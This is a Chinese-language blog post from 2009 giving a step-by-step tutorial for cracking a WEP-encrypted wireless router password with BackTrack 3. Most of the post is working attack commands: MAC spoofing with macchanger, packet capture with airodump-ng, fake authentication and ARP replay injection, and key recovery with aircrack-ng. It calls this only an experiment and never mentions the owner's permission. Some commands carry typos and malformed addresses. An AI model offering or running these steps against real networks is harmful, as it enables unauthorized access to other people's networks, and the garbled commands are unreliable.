« Google Wave: The Next Wave of Social Media?
微软推出必应 Bing Toolbox 工具箱 »

June
26th
2009

WLAN安全 – 用BT3破解无线路由密码

信息安全 实用技巧 3条评论 4,237次阅读

1次评分, 平均分: 1 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 5
评分: 很差劲不怎样还可以还不错太棒了
Loading ... Loading ...

Backtrack_3.0_Final
由于无线网络的飞速发展,时下好多个人都用起了无线路由器,默认状态下无线路由是用WEP加密的,但稍有常识的人都会知道, WEP非常特别以及极其的不安全,下面我就用BT工具来做个实验,仅仅是实验。BT是BackTrack的缩写,它是基于Slackware和SLAX的自启动运行光盘,它包含了一套安全及计算机取证工具。它其实是依靠融合Auditor Security Linux和WHAX(先前的Whoppix)而创建成的。 里面集成了好多黑客工具,非常强大。废话就不多说了,破解开始:

1. 修改无线网卡的MAC地址

airmon-ng //返回 无线网卡列表
airmon-ng stop wifi0 //停止无线网卡
ifconfig wif0 down //停止无线网络
macchanger -m 00:11:22:33:44:55 wifi0 //修改网卡的mac地址
airmon-ng start wifi0 //修改后启动,应该是两个无线网卡,例如:ath0

2. 查找无线网络

airodump-ng ath0 //成功后会出现一个列表,而且不断的有pack进出,然后ctrl+c停止

3. 抓包
这里我先假设测试的无线路由名字(ESSID)叫Techippo,频道:11,MAC地址(BSSID):88:88:88:88:88:88

airodump-ng -c 11 -w dump –bssid 88:88:88:88:88 ath0 //dump为包的名字可随意命名

新开一个Shelll

aireply-ng -1 0 -e Techippo -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0

运行完这条命令后会显示关联成功,成功后才可以进行下一步操作,如果提示关联不成功有可能是信号太弱或者网卡不支持。
接下来在运行下面这条命令,抓包开始。不要关闭这个shell。

aireply-ng -3 -b 88:88:88:88:88 -h 00:11:22:33:44:55 ath0

4. 破解
再重新开一个Shell。运行下面这条命令。

aircrack-ng -n 64 -b 88:88:88:88:88 dump-01.cap

破解开始,在接下来出现的Key Found:后面显示的就是该无线路由的密码。

From: techippo

3 people like this post.
Unlike
  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Twitter
  • Live
  • LinkedIn
  • Yahoo! Bookmarks
  • RSS
  • email
  • Print
  • PDF

相关文章阅读

喜欢这篇文章?订阅我的RSS,就可以自动获取最新内容了!

Tags:, .
评论数量: 3条评论
引用: http://www.i4wei.com/2009/06/861/


  1. techippo
    July 2nd, 2009 at 10:12 | #1
    Reply | Quote

    这帖子看着好眼熟哦。

  2. 日光博客
    June 27th, 2009 at 20:19 | #2
    Reply | Quote

    zblog自带的评论插件TotoroⅡ!!!

  3. 日光博客
    June 27th, 2009 at 00:01 | #3
    Reply | Quote

    很实用呀!!!

  1. 还没有trackbacks.